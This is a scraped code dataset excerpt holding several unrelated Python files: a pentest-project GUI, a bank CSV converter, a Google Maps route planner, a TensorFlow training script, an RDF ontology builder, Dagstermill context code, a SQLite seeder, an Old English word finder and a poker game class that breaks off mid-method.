tkinter.messagebox.showerror(\"Defects templates import\", \"Defects templatest failed\")\n else:\n tkinter.messagebox.showinfo(\"Defects templates import\", \"Defects templates completed\")\n return success\n\n def openPentestsWindow(self, _event=None, pentests=None):\n \"\"\"\n Open Pentest dialog window\n Args:\n _event: Not used but mandatory\n Returns:\n None if no database were selected\n datababase name otherwise\n \"\"\"\n dialog = ChildDialogPentests(self, pentests)\n try:\n dialog.wait_window(dialog)\n except tk.TclError:\n pass\n if dialog.rvalue is not None:\n self.openPentest(dialog.rvalue)\n return dialog.rvalue\n\n\n def newPentest(self, pentestName, pentest_type, start_date, end_date, scope, settings, pentesters):\n \"\"\"\n Register the given pentest name into database and opens it.\n\n Args:\n pentestName: The pentest database name to register in database.\n \"\"\"\n succeed = False\n if pentestName is not None:\n apiclient = APIClient.getInstance()\n succeed, msg = apiclient.registerPentest(pentestName, pentest_type, start_date, end_date, scope, settings, pentesters)\n if not succeed:\n tkinter.messagebox.showinfo(\"Forbidden\", msg)\n return succeed\n\n def closePentest(self):\n \"\"\"\n Close the current pentest and refresh the treeview.\n \"\"\"\n apiclient = APIClient.getInstance()\n apiclient.dettach(self)\n if self.terminals is not None:\n self.terminals.onClosing()\n \n if self.scanManager is not None:\n self.scanManager.onClosing()\n \n \n for module in self.modules:\n if callable(getattr(module[\"object\"], \"onClosing\", None)):\n module[\"object\"].onClosing()\n\n def openPentest(self, filename=\"\"):\n \"\"\"\n Open the given database name. Loads it in treeview.\n\n Args:\n filename: the pentest database name to load in application. 
If \"\" is given (default), will refresh the already opened database if there is one.\n \"\"\"\n pentestName = None\n apiclient = APIClient.getInstance()\n\n if filename == \"\" and apiclient.getCurrentPentest() != \"\":\n pentestName = apiclient.getCurrentPentest()\n elif filename != \"\":\n pentestName = filename.split(\".\")[0].split(\"/\")[-1]\n if pentestName is not None:\n self.closePentest()\n first_use_detected = self.detectFirstUse()\n res = apiclient.setCurrentPentest(pentestName, first_use_detected)\n if not res:\n tk.messagebox.showerror(\"Connection failed\", \"Could not connect to \"+str(pentestName))\n return\n DataManager.getInstance().load()\n self.initUI()\n self.statusbar.refreshTags(Settings.getTags(ignoreCache=True))\n self.sio.emit(\"registerForNotifications\", {\"token\":apiclient.getToken(), \"pentest\":pentestName})\n self.settings.reloadSettings()\n self.refresh_tabs()\n self.nbk.select(\"Dashboard\")\n\n def refresh_tabs(self):\n apiclient = APIClient.getInstance()\n if apiclient.isAdmin():\n self.nbk.add(self.adminViewFrame, \"Admin\", order=Module.LAST_PRIORITY, image=self.admin_tab_img)\n else:\n self.nbk.delete(\"Admin\")\n pentest_type = self.settings.getPentestType()\n for module in self.modules:\n pentest_type_allowed = pentest_type.lower() in module[\"object\"].__class__.pentest_types\n all_are_authorized = \"all\" in module[\"object\"].__class__.pentest_types\n module_need_admin = module[\"object\"].__class__.need_admin\n is_admin = apiclient.isAdmin()\n if (pentest_type_allowed or all_are_authorized) and (is_admin or not module_need_admin):\n self.nbk.add(module[\"view\"], module[\"name\"].strip(), order=module[\"object\"].__class__.order_priority, image=module[\"img\"])\n else: \n self.nbk.delete(module[\"name\"])\n\n \n def importExistingTools(self, _event=None):\n \"\"\"\n Ask user to import existing files to import.\n \"\"\"\n dialog = ChildDialogFileParser(self)\n self.wait_window(dialog.app)\n\n def detectFirstUse(self):\n detector = os.path.join(utils.getConfigFolder(),\".first_use\")\n if os.path.exists(detector):\n return False\n with open(detector, mode=\"w\") as f:\n f.write(\"\")\n return True\n","repo_name":"fbarre96/PollenisatorGUI","sub_path":"pollenisatorgui/core/application/appli.py","file_name":"appli.py","file_ext":"py","file_size_in_byte":59578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8689513657","text":"import csv\n\nimport arrow\n\nfrom .cmd import in_file, ledger, out_file, write_csv\n\n\ndef transform_row(row):\n date = arrow.get(row[5], \"YYYY-MM-DD\")\n date = date.format(\"YYYY-MM-DD\")\n value = row[-2]\n description = row[8]\n return [date, description, value]\n\n\n@ledger.command()\n@in_file(encoding=\"ISO-8859-1\")\n@out_file(\"/tmp/swedbank-to-reckon.csv\")\ndef swedbank_to_reckon(file, outfile):\n \"\"\"\n Converts Swedbank csv output so that it's parsable by cantino/reckon.\n \"\"\"\n reader = csv.reader(file)\n # Skip date header\n next(reader)\n # Skip date header\n next(reader)\n write_csv(reader, outfile, transform_row)\n","repo_name":"danihodovic/dht","sub_path":"src/ledger/swedbank.py","file_name":"swedbank.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"12110262966","text":"import googlemaps\nfrom datetime import datetime\nimport itertools\n\nlista_end = []\nseletor = 0\nmatriz_dist_temp = []\ninicial = 0\nselect_inicial = 0\n\ndef 
menu_inicial():\n    seletor = input(\"\\n \\n Select an option: \\n \\n a -> Add addresses; remember the first one will be the starting point \\n b -> Compute the best route \\n \")\n    if seletor == \"a\":\n        add_end = input(\"Enter the address:\")\n        lista_end.append (add_end)\n        print (lista_end)\n        menu_inicial()\n\n    elif seletor == \"b\":\n        api_dist()\n    \ndef api_dist():\n\n    for x,y in itertools.combinations(lista_end, 2):\n        end_1 = x\n        end_2 = y\n\n        api_key = 'ADD YOUR KEY HERE'\n\n        client = googlemaps.Client(api_key)\n\n        origin = end_1\n        destination = end_2\n\n        now = datetime.now()\n\n        directions_result = client.directions(origin, destination, mode=\"driving\", departure_time=now)\n\n        distance = directions_result[0]['legs'][0]['distance']['value']\n        duration = directions_result[0]['legs'][0]['duration']['text']\n\n        steps = directions_result[0]['legs'][0]['steps']\n\n        print (f\"The distance between {origin} and {destination} is {distance}\")\n\n        dist = (origin, destination, distance)\n        \n        matriz_dist_temp.append (dist)\n        \n\n        # Print the steps of the route\n        # print(\"The steps for the route are:\")\n        # for step in steps:\n        #     print (step['html_instructions'])\n\ndef get_google_maps_url(visited2):\n    base_url = \"https://www.google.com/maps/dir/\"\n\n    endq = ''.join(map(str, visited2))\n\n    google_maps_url = base_url + endq\n\n    return google_maps_url\n\ndef main():\n    menu_inicial() \n    print (matriz_dist_temp)\n    lst= matriz_dist_temp\n\n    result = {}\n    for item in lst:\n        src, dest, weight = item\n        if src not in result:\n            result[src] = {}\n        if dest not in result:\n            result[dest] = {}\n        result[src][dest] = weight\n        result[dest][src] = weight if dest in result[src] else 0\n    \n    for node in result:\n        result[node] = {k: v for k, v in result[node].items() if v != 0}\n    print (result)\n\n\n    nodes = lista_end\n    distances = result\n\n    unvisited = {node: None for node in nodes} \n    visited = {}\n    visited_list_2 = []\n    current = lista_end[0]\n    currentDistance = 0\n    unvisited[current] = currentDistance\n\n    while True:\n        for neighbour, distance in distances[current].items():\n            if neighbour not in unvisited: continue\n            newDistance = currentDistance + distance\n            if unvisited[neighbour] is None or unvisited[neighbour] > newDistance:\n                unvisited[neighbour] = newDistance\n        visited[current] = currentDistance\n        del unvisited[current]\n        if not unvisited: break\n        candidates = [node for node in unvisited.items() if node[1]]\n        current, currentDistance = sorted(candidates, key = lambda x: x[1])[0]\n\n    print(\"visited\", visited)\n    items_str = ', '.join(visited)\n\n    print(\"items_str\", items_str)\n\n    \n    ## route list as a single string \n    items_str = ', '.join(visited)\n\n    ## strip the distances out of visited \n    visited_list = [item.strip() for item in items_str.split(',')]\n\n    print(\"visited_list\", visited_list)\n    \n\n    print(\"The number of items in visited_list is:\", len(visited_list))\n    \n    for item in visited_list:\n        visited_list_2.append(item.replace(\" \", \"+\"))\n        print(visited_list_2)\n    \n\n\n    maps_url = get_google_maps_url('/'.join(visited_list_2))\n\n    print(\"Google Maps URL:\", maps_url)\n    exit()\n\n\nmain()\n","repo_name":"JuCastro01/Projeto-grafos-alg-dijkstra","sub_path":"app-enderecos.py","file_name":"app-enderecos.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38679000282","text":"\"\"\"\ntrain a simple compression model\n\"\"\"\nfrom datetime import datetime\nimport time\n\nimport tensorflow as tf\nimport 
sg_model\n#pylint: disable=W0201\n\nFLAGS = tf.app.flags.FLAGS\n\ntf.app.flags.DEFINE_string('train_dir', 'compress_train_log/',\n                           \"\"\"Directory where to write event logs and checkpoint\"\"\")\ntf.app.flags.DEFINE_integer('max_steps', 1,\n                            \"\"\"Number of batches to run.\"\"\")\ntf.app.flags.DEFINE_boolean('log_device_placement', False,\n                            \"\"\"Whether to log device placement.\"\"\")\n\ndef train():\n    \"\"\"train my simple compress model.\"\"\"\n    with tf.Graph().as_default():\n        #global_step for learning-rate decay\n        global_step = tf.Variable(0, name='global_step', trainable=False)\n        #global_step = tf.Variable(0, trainable=False, name='global_step')\n        #global_step should be a tensor with name 'global_step')\n        #get images from input\n        images, labels = sg_model.inputs(eval_data=False, batch_size=FLAGS.batch_size)\n        #inference model\n        resi_images = sg_model.inference(images)\n        #calculate loss\n        loss_l1 = sg_model.loss(resi_images)\n        #learning decay\n        starter_learning_rate = 0.1\n        learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,\n                                                   150000, 0.1, staircase=True)\n        #train op, back propagation\n        train_op = tf.train.AdamOptimizer(learning_rate).minimize(loss_l1,\n                                                                  global_step=global_step)\n        init = tf.initialize_all_variables()\n        init_local = tf.initialize_local_variables()\n        class _LoggerHook(tf.train.SessionRunHook):\n            \"\"\"logs loss and runtime\"\"\"\n            def begin(self):\n                self._step = -3  # there are two initialization steps before training begins\n\n            def before_run(self, run_context):\n                self._step += 1\n                self._start_time = time.time()\n                return tf.train.SessionRunArgs(loss_l1)\n\n            def after_run(self, run_context, run_values):\n                duration = time.time() - self._start_time\n                loss_value = run_values.results\n                if self._step % 10 == 0:\n                    num_examples_per_step = FLAGS.batch_size\n                    examples_per_sec = num_examples_per_step / duration\n                    sec_per_batch = float(duration)\n\n                    format_str = ('%s: step %d, loss_l1 = %.2f (%.1f examples/sec; %.3f'\n                                  'sec/batch)')\n                    print (format_str % (datetime.now(), self._step, loss_value,\n                                         examples_per_sec, sec_per_batch))\n        with tf.train.MonitoredTrainingSession(checkpoint_dir=FLAGS.train_dir,\n                                               hooks=[tf.train.StopAtStepHook(\n                                                   last_step=FLAGS.max_steps),\n                                                      tf.train.NanTensorHook(loss_l1),\n                                                      _LoggerHook()],\n                                               config=tf.ConfigProto(\n                                                   log_device_placement=\n                                                   FLAGS.log_device_placement)) as mon_sess:\n            summary_writer = tf.summary.FileWriter('./log', mon_sess.graph)\n            mon_sess.run(init)\n            mon_sess.run(init_local)\n            while not mon_sess.should_stop():\n                mon_sess.run(train_op)\n            summary_writer.close()\n\ndef main(argv=None):\n    \"\"\"\n    tensorflow main function\n    \"\"\"\n    train()\n\nif __name__ == '__main__':\n    # main entry point\n    tf.app.run()\n","repo_name":"AlexanderCaesar/goole-img-compression","sub_path":"google-img-compression-simple/sg_train.py","file_name":"sg_train.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"30694953747","text":"import rdflib\nfrom rdflib import Literal\n\ncounter = 0\n\n###############################################################################\n############################################################### primitives ####\n\ndef generate_id ():\n    global counter\n    \n    count = counter\n    counter += 1\n    return count\n\ndef add_instance (i, c):\n    g.add( (i, RDF['type'], c) )\n\ndef add_object_property(obj, pred, sub):\n    g.add( (obj, pred, sub) )\n\ndef add_data_property(obj, pred, sub):\n    g.add( (obj, pred, Literal(str(sub))) 
)\n\n###############################################################################\n################################################################## classes ####\n\ndef construct_organization (name):\n name = name.replace(' ', '_')\n organization = DEFAULT['organization/%s' % name]\n add_instance(organization, SCHEMA['Organization'])\n add_data_property(organization, SCHEMA['legalName'], name)\n return organization\n\ndef construct_outdoors ():\n outdoors = DEFAULT['outdoors']\n add_instance(outdoors, BRICK['Outdoors'])\n g.add( (BRICK['Outdoors'], RDFS['subClassOf'], BRICK['Location']) )\n add_data_property(outdoors, BRICK['label'], 'outdoors')\n return outdoors\n\ndef construct_building (name):\n name = name.replace(' ', '_')\n building = DEFAULT['buildings/%s' % name]\n add_instance(building, BRICK['Building'])\n add_data_property(building, BRICK['label'], name)\n return building\n\ndef construct_room (name):\n name = name.replace(' ', '_')\n room = DEFAULT['buildings/%s' % name]\n add_instance(room, BRICK['Room'])\n add_data_property(room, BRICK['label'], name)\n return room\n\ndef construct_service (name):\n name = name.replace(' ', '_')\n service = DEFAULT['services/%s' % name]\n add_instance(service, SAL['Service'])\n add_data_property(service, SAL['name'], Literal(name))\n return service\n\ndef construct_sep (service, organization, url, read, write, priority):\n # add information object\n sep = DEFAULT['sep/%u' % generate_id()]\n if read and write:\n add_instance(sep, SAL['KafkaRWServiceEndpoint'])\n elif read:\n add_instance(sep, SAL['KafkaRServiceEndpoint'])\n elif write:\n add_instance(sep, SAL['KafkaWServiceEndpoint'])\n else:\n print('ERROR: Attempting to add SEP(%s, %s, %s, %s, %s, %s) with r/w mismatch' % (service, organization, url, read, write, priority))\n \n if read:\n add_data_property(sep, SAL['read_topic'] , url)\n if write:\n add_data_property(sep, SAL['write_topic'], url)\n \n# add_instance(sep, SAL['ServiceEndpoint'])\n# add_data_property(sep, SAL['url'] , url)\n# add_data_property(sep, SAL['read'] , read)\n# add_data_property(sep, SAL['write'] , write)\n add_data_property(sep, SAL['priority'], priority)\n \n # link service to service endpoint object\n add_object_property(service, SAL['hasServiceEndpoint'], sep)\n \n # link service endpoint object to organization\n add_object_property(sep, SAL['ownedBy'], organization)\n \n return sep\n\ndef construct_information (sep, location_data, modality, unit, temporal, location):\n # add information object\n info = DEFAULT['info/%u' % generate_id()]\n add_instance(info, SAL['Information'])\n add_data_property( info, SAL['location'] , location_data)\n add_object_property(info, SAL['hasModality'] , modality)\n add_object_property(info, SAL['hasUnit'] , unit)\n add_object_property(info, SAL['hasTemporalAspect'], temporal)\n add_object_property(info, SAL['hasLocation'] , location)\n \n # link service endpoint to information object\n add_object_property(sep, SAL['hasInformation'], info)\n \n return info\n\n###############################################################################\n##################################################################### misc ####\n\ndef serialize (filename):\n g.serialize(filename, 'turtle')\n\n###############################################################################\n##################################################################### main ####\n\ng = rdflib.Graph()\nRDF = rdflib.Namespace('http://www.w3.org/1999/02/22-rdf-syntax-ns#')\nRDFS = 
rdflib.Namespace('http://www.w3.org/2000/01/rdf-schema#')\nSAL     = rdflib.Namespace('https://ontology.hviidnet.com/sal.ttl#')\nSALI    = rdflib.Namespace('https://ontology.hviidnet.com/sali.ttl#')\nBRICK   = rdflib.Namespace('http://brickschema.org/ttl/Brick.ttl#')\nSCHEMA  = rdflib.Namespace('http://schema.org/version/latest/schema.ttl#')\nDEFAULT = rdflib.Namespace('https://ontology.hviidnet.com/defaultbuilding.ttl#')\ng.bind('sal'    , SAL)\ng.bind('sali'   , SALI)\ng.bind('default', DEFAULT)\n\n","repo_name":"jakobhviid/ServiceAbstractionLayer","sub_path":"src/shared.py","file_name":"shared.py","file_ext":"py","file_size_in_byte":4712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18000677073","text":"\r\nnums=[]\r\nn=5\r\nmayor=None\r\nposi=0\r\n\r\nfor i in range(n):\r\n    num= int(input(\"Enter the number: \"))\r\n    nums.append(num)\r\n    if mayor is None or num > mayor:\r\n        mayor=num\r\n        posi=i\r\nprint (\"The largest number is:\",mayor ,\"and it is located at position:\",posi)","repo_name":"axellicoaa/Programaci-n","sub_path":"TallerLista1.py","file_name":"TallerLista1.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9894940317","text":"from typing import AbstractSet, Any, Mapping, Optional, cast\n\nfrom dagster import (\n    DagsterRun,\n    JobDefinition,\n    OpDefinition,\n    _check as check,\n)\nfrom dagster._annotations import public\nfrom dagster._core.definitions.dependency import Node, NodeHandle\nfrom dagster._core.execution.context.compute import AbstractComputeExecutionContext\nfrom dagster._core.execution.context.system import PlanExecutionContext, StepExecutionContext\nfrom dagster._core.log_manager import DagsterLogManager\nfrom dagster._core.system_config.objects import ResolvedRunConfig\n\n\nclass DagstermillExecutionContext(AbstractComputeExecutionContext):\n    \"\"\"Dagstermill-specific execution context.\n\n    Do not initialize directly: use :func:`dagstermill.get_context`.\n    \"\"\"\n\n    def __init__(\n        self,\n        job_context: PlanExecutionContext,\n        job_def: JobDefinition,\n        resource_keys_to_init: AbstractSet[str],\n        op_name: str,\n        node_handle: NodeHandle,\n        op_config: Any = None,\n    ):\n        self._job_context = check.inst_param(job_context, \"job_context\", PlanExecutionContext)\n        self._job_def = check.inst_param(job_def, \"job_def\", JobDefinition)\n        self._resource_keys_to_init = check.set_param(\n            resource_keys_to_init, \"resource_keys_to_init\", of_type=str\n        )\n        self.op_name = check.str_param(op_name, \"op_name\")\n        self.node_handle = check.inst_param(node_handle, \"node_handle\", NodeHandle)\n        self._op_config = op_config\n\n    def has_tag(self, key: str) -> bool:\n        \"\"\"Check if a logging tag is defined on the context.\n\n        Args:\n            key (str): The key to check.\n\n        Returns:\n            bool\n        \"\"\"\n        check.str_param(key, \"key\")\n        return self._job_context.has_tag(key)\n\n    def get_tag(self, key: str) -> Optional[str]:\n        \"\"\"Get a logging tag defined on the context.\n\n        Args:\n            key (str): The key to get.\n\n        Returns:\n            str\n        \"\"\"\n        check.str_param(key, \"key\")\n        return self._job_context.get_tag(key)\n\n    @public\n    @property\n    def run_id(self) -> str:\n        \"\"\"str: The run_id for the context.\"\"\"\n        return self._job_context.run_id\n\n    @public\n    @property\n    def run_config(self) -> Mapping[str, Any]:\n        \"\"\"dict: The run_config for the context.\"\"\"\n        return self._job_context.run_config\n\n    @property\n    def resolved_run_config(self) -> ResolvedRunConfig:\n        
\"\"\":class:`dagster.ResolvedRunConfig`: The resolved_run_config for the context.\"\"\"\n return self._job_context.resolved_run_config\n\n @public\n @property\n def logging_tags(self) -> Mapping[str, str]:\n \"\"\"dict: The logging tags for the context.\"\"\"\n return self._job_context.logging_tags\n\n @public\n @property\n def job_name(self) -> str:\n \"\"\"str: The name of the executing job.\"\"\"\n return self._job_context.job_name\n\n @public\n @property\n def job_def(self) -> JobDefinition:\n \"\"\":class:`dagster.JobDefinition`: The job definition for the context.\n\n This will be a dagstermill-specific shim.\n \"\"\"\n return self._job_def\n\n @property\n def resources(self) -> Any:\n \"\"\"collections.namedtuple: A dynamically-created type whose properties allow access to\n resources.\n \"\"\"\n return self._job_context.scoped_resources_builder.build(\n required_resource_keys=self._resource_keys_to_init,\n )\n\n @public\n @property\n def run(self) -> DagsterRun:\n \"\"\":class:`dagster.DagsterRun`: The job run for the context.\"\"\"\n return cast(DagsterRun, self._job_context.dagster_run)\n\n @property\n def log(self) -> DagsterLogManager:\n \"\"\":class:`dagster.DagsterLogManager`: The log manager for the context.\n\n Call, e.g., ``log.info()`` to log messages through the Dagster machinery.\n \"\"\"\n return self._job_context.log\n\n @public\n @property\n def op_def(self) -> OpDefinition:\n \"\"\":class:`dagster.OpDefinition`: The op definition for the context.\n\n In interactive contexts, this may be a dagstermill-specific shim, depending whether an\n op definition was passed to ``dagstermill.get_context``.\n \"\"\"\n return cast(OpDefinition, self._job_def.node_def_named(self.op_name))\n\n @property\n def node(self) -> Node:\n \"\"\":class:`dagster.Node`: The node for the context.\n\n In interactive contexts, this may be a dagstermill-specific shim, depending whether an\n op definition was passed to ``dagstermill.get_context``.\n \"\"\"\n return self.job_def.get_node(self.node_handle)\n\n @public\n @property\n def op_config(self) -> Any:\n \"\"\"collections.namedtuple: A dynamically-created type whose properties allow access to\n op-specific config.\n \"\"\"\n if self._op_config:\n return self._op_config\n\n op_config = self.resolved_run_config.ops.get(self.op_name)\n return op_config.config if op_config else None\n\n\nclass DagstermillRuntimeExecutionContext(DagstermillExecutionContext):\n def __init__(\n self,\n job_context: PlanExecutionContext,\n job_def: JobDefinition,\n resource_keys_to_init: AbstractSet[str],\n op_name: str,\n step_context: StepExecutionContext,\n node_handle: NodeHandle,\n op_config: Any = None,\n ):\n self._step_context = check.inst_param(step_context, \"step_context\", StepExecutionContext)\n super().__init__(\n job_context,\n job_def,\n resource_keys_to_init,\n op_name,\n node_handle,\n op_config,\n )\n\n @property\n def step_context(self) -> StepExecutionContext:\n return self._step_context\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/libraries/dagstermill/dagstermill/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":5793,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"16120762401","text":"#### compute the perimeter and the area of shapes\r\n\r\n\r\nwhile True: #unlimited loop for input\r\n shape_input = str(input(\"enter your shape name: \"))\r\n shape = shape_input.lower()\r\n \r\n #checking the right input\r\n if shape == 'circle':\r\n R = 
int(input(\"enter the radius of Circle: \"))\r\n \r\n circle_perimeter = 3.14*R*2\r\n circle_area = 3.14*R*R\r\n print(\"the perimeter of the circle is: {}{}the area of the circle is: {}\".format(circle_perimeter,'\\n',circle_area))\r\n #break\r\n elif shape == 'square':\r\n E = int(input(\"enter a edge of Square: \"))\r\n \r\n square_perimeter = E*4\r\n square_area = E**2\r\n print(\"the perimeter of the Square is: {}{}the area of the Square is: {}\".format(square_perimeter,'\\n',square_area))\r\n #break\r\n elif shape == 'rectangle':\r\n L = int(input(\"enter the length of Rectangle: \"))\r\n W = int(input(\"enter the width of Rectangle: \"))\r\n \r\n Rectangle_perimeter = (L+W)*2\r\n Rectangle_area = L*W\r\n print(\"the perimeter of the Rectangle is: {}{}the area of the Rectangle is: {}\".format(Rectangle_perimeter,'\\n',Rectangle_area))\r\n #break in case that u want to break the loop if the first shape name was correct :)\r\n else:\r\n print(\"Your entered name is wrong!\")\r\n \r\n","repo_name":"Roberick313/Workshop","sub_path":"project_12.py","file_name":"project_12.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"86286218535","text":"#! usr/bin/env python3\n\n\"\"\"\nCleans DOE poetry corpus intolist of words\n\"\"\"\n\nimport re\nfrom termcolor import colored\n\npoem = input(\"\"\"Poem to search: \\n[1] Beowulf [2] Judith [3] Genesis [4] Exodus \n[5] Daniel [6] Andreas [7] Christ & Satan \"\"\")\n\nseek = input('Word to find: ')\n\nif poem == '1':\n my_file = 'beowulf.txt'\nif poem == '2':\n my_file = 'judith.txt'\nif poem == '3':\n my_file = 'genesis.txt'\nif poem == '4':\n my_file = 'exodus.txt'\nif poem == '5':\n my_file = 'daniel.txt'\nif poem == '6':\n my_file = 'andreas.txt'\nif poem == '7':\n my_file = 'christandsatan.txt'\n\nwith open(my_file, 'r') as fh:\n text = fh.read()\n text = text.lower()\n\n words = text.split()\n\n bigrams = [seek,]\n\n for index, word in enumerate(words):\n if word == seek:\n if index == len(words):\n print(index, colored(word, 'red'),' is the last word')\n elif index < len(words)-1:\n print(index, colored(word, 'red'),\n colored(words[index+1], 'red'))\n bigrams.append(words[index+1])\n\n\nprint(\"_____________________\\n\\nInstances of {0}: {1}\".format(seek, len(bigrams)))\nprint(bigrams)\n\n# _____________NOTES\n# \n# instances = re.findall(r\"\\b{0}\\b\".format(word), words)\n\n\n","repo_name":"sharris-umass/oe_fst","sub_path":"poetry/word.py","file_name":"word.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"5145742676","text":"import sqlite3\nimport os\nimport schema\n\nDIRPATH = os.path.dirname(__file__)\nDBFILENAME = \"college.db\"\nDBPATH = os.path.join(DIRPATH,DBFILENAME)\n\ndbpath = DBPATH\n\n\ndef seed(dbpath):\n schema.schema(dbpath)#to rerun the schema clear the tables before running this code \n\n campuses = [\n (\"New York\",\"NY\"), # pk 1\n (\"Houston\",\"TX\")] # pk 2\n\n students = [\n (\"Walker\", \"Lockett\", 3.1, 1),# pk 1\n (\"Casey\", \"Coleman\", 2.7, 1),# pk 2\n (\"Franklyn\", \"Kilome\", 3.8, 1),# pk 3\n (\"Hecton\", \"Santiago\", 2.9, 1),# pk 4\n (\"Framber\", \"Valdez\", 3.9, 2),# pk 5\n (\"Brad\", \"Peacock\", 2.8, 2),# pk 6\n (\"Reymin\", \"Guduan\", 3.5, 2),# pk 7\n (\"Gerrit\", \"Cole\", 3.0, 2)]# pk 8\n\n with sqlite3.connect(dbpath) as connection:\n cursor = connection.cursor()\n SQL = \"\"\"INSERT 
INTO campuses(city, state) VALUES(?,?);\"\"\"\n        for campus in campuses:\n            cursor.execute(SQL,campus)\n\n    with sqlite3.connect(dbpath) as connection:\n        cursor = connection.cursor()\n        SQL = \"\"\"INSERT INTO students(first_name, last_name, gpa, campus_pk) VALUES(?,?,?,?);\"\"\"\n        for student in students:\n            cursor.execute(SQL,student)\n    \n\n\n\nif __name__ == \"__main__\":\n    seed(dbpath) # comment this out after the first run","repo_name":"NWood-Git/phase1_assessment","sub_path":"ANSWER_2/seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70664764008","text":"from handEvaluator import *\r\nfrom playerClass import *\r\nfrom winnerFinder import *\r\nimport copy\r\nimport time\r\n################################################################################\r\n\r\n#Takes care of all gameflow mechanics of the poker game,\r\n#including changing players and advancing turns and rounds\r\n\r\nclass gameFlow():\r\n    def __init__(self, numPlayers, playersList, game):\r\n        self.roundNum = 1\r\n        self.numPlayers = numPlayers\r\n        self.smallBlind = 0\r\n        self.bigBlind = self.smallBlind + 1\r\n        self.dealer = (self.smallBlind - 1) % self.numPlayers\r\n        self.defBet = 20\r\n        self.minimumBet = self.defBet\r\n        self.currentPlayer = (self.bigBlind + 1) % self.numPlayers\r\n        self.bigBlindVal = self.minimumBet\r\n        self.smallBlindVal = self.bigBlindVal // 2\r\n        self.betList = [0] * self.numPlayers\r\n        self.round = 1\r\n        self.gameOver = False\r\n        self.curBet = self.minimumBet\r\n        self.tempBet = self.minimumBet\r\n        self.onBoard = []\r\n        self.game = game\r\n        self.pot = 0\r\n        self.gameStage = [\"Pre-Flop\"]\r\n        self.lastRound = False\r\n        self.gameStatus = [2] * self.numPlayers\r\n        self.roundWinner = None\r\n        self.winnerHand = None\r\n        self.winnerType = None\r\n        self.roundOver = False\r\n        self.lastPlayerMove = None\r\n        self.messages = []\r\n        self.winDueToFold = [False, \"has won as everyone else folded\"]\r\n        self.count = 0\r\n        self.checkAfterRaise = False\r\n        self.checkAfterCheck = False\r\n        self.theatreMode = False\r\n        self.numMoves = 0\r\n        #0 - Folded\r\n        #1 - Check\r\n        #2 - Raise/Recheck\r\n\r\n    def updateStatus(self, playerList):\r\n        status = copy.copy(self.gameStatus)\r\n        money = []\r\n        for i in range(len(playerList)):\r\n            player = playerList[i]\r\n            if player.money > 0 and player.fold == False and status[i] != 0:\r\n                status[i] = True\r\n            else:\r\n                status[i] = False\r\n            if player.money == 0:\r\n                money.append(player.money)\r\n        if money == [0] * self.numPlayers:\r\n            self.gameStatus = [1] * self.numPlayers\r\n            status = [True] * self.numPlayers\r\n        return status\r\n\r\n\r\n\r\n    def move(self, move, playerID, playersList):\r\n        if self.currentPlayer == 0 and move == \"raise\":\r\n            currentAI = self.game.AIList[(self.currentPlayer + 1) % self.numPlayers]\r\n            currentAI.raised = False\r\n        currPlayer = playersList[self.currentPlayer]\r\n        if move == \"fold\":\r\n            self.messages.append(\"Player \" + str(playerID) + \" has FOLDED\")\r\n            currPlayer.fold = True\r\n            currPlayer.alreadyPlayed = True\r\n            self.gameStatus[self.currentPlayer] = 0\r\n            self.lastPlayerMove = \"fold\"\r\n        elif move == \"check/call\":\r\n            if self.lastPlayerMove == \"check/call\":\r\n                self.checkAfterCheck = True\r\n            if self.lastPlayerMove == \"raise\":\r\n                self.checkAfterRaise = True\r\n            self.messages.append(\"Player \" + str(playerID) + \" has CHECKED/CALLED\")\r\n            call = max(self.betList) - self.betList[playerID]\r\n            if call > currPlayer.money:\r\n                
call = currPlayer.money\r\n            currPlayer.money -= call\r\n            self.betList[playerID] += call\r\n            currPlayer.alreadyPlayed = True\r\n            self.lastPlayerMove = \"check/call\"\r\n            self.gameStatus[self.currentPlayer] = 1\r\n        elif move == \"raise\":\r\n            if self.lastPlayerMove == \"raise\":\r\n                self.tempBet *= 2\r\n            self.checkAfterRaise = False\r\n            self.messages.append(\"Player \" + str(playerID) + \" RAISED\")\r\n            if currPlayer.money - self.tempBet < 0:\r\n                self.tempBet = currPlayer.money\r\n            self.minimumBet = self.tempBet\r\n            currPlayer.money -= self.tempBet\r\n            self.betList[playerID] += self.tempBet\r\n            currPlayer.alreadyPlayed = True\r\n            self.gameStatus[self.currentPlayer] = 2\r\n            self.lastPlayerMove = \"raise\"\r\n            for i in range(len(self.gameStatus)):\r\n                if self.gameStatus[i] == 1:\r\n                    self.gameStatus[i] = 2\r\n        self.advancePlayer(self.game.players)\r\n        self.currentPlayer %= self.numPlayers\r\n\r\n    def advancePlayer(self, playerList):\r\n        status = self.updateStatus(playerList)\r\n        self.currentPlayer += 1\r\n        if status.count(True) == 1:\r\n            self.roundWinner = status.index(True)\r\n            self.winnerHand = self.game.playerHands[self.roundWinner]\r\n            self.pot += sum(self.betList)\r\n            self.winDueToFold[0] = True\r\n            self.roundOver = True\r\n        if 2 not in self.gameStatus:\r\n            self.nextTurn(playerList)\r\n        \r\n        if self.gameStatus.count(1) == self.numPlayers - 1 - self.gameStatus.count(0) and self.checkAfterRaise == True:\r\n            self.checkAfterRaise = False\r\n            